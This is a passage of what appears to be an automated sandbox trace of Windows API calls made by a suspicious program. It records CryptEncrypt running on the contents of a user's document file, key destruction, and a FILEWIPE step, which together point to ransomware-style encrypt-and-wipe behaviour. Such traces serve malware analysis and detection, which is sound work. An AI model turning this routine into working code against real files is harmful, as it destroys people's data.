dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.017] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.017] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.017] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.017] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.017] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.018] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.018] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.018] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x58fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x5900) returned 1 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.018] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] CharLowerBuffW (in: lpsz="byte[22785]", cchLength=0xb | out: lpsz="byte[22785]") returned 0xb [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.019] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.019] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf5228*, pdwDataLen=0x87e820*=0x58fc, dwBufLen=0x5900 | out: pbData=0xbf5228*, pdwDataLen=0x87e820*=0x5900) returned 1 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.019] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.019] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.019] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.020] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.020] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.023] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.023] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.024] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.024] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0178.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.024] CryptDestroyKey (hKey=0x90aed8) returned 1 [0178.024] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.024] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.024] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.024] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.036] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.036] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.036] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.036] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.036] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.036] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.037] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.037] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.037] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.037] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.037] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.039] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.040] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.040] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.040] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.041] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0x90ae18 [0178.041] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.041] CharLowerBuffW (in: lpsz="byte[22780]", cchLength=0xb | out: lpsz="byte[22780]") returned 0xb [0178.041] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.041] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.041] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.042] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.042] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0178.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.042] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.043] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.043] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 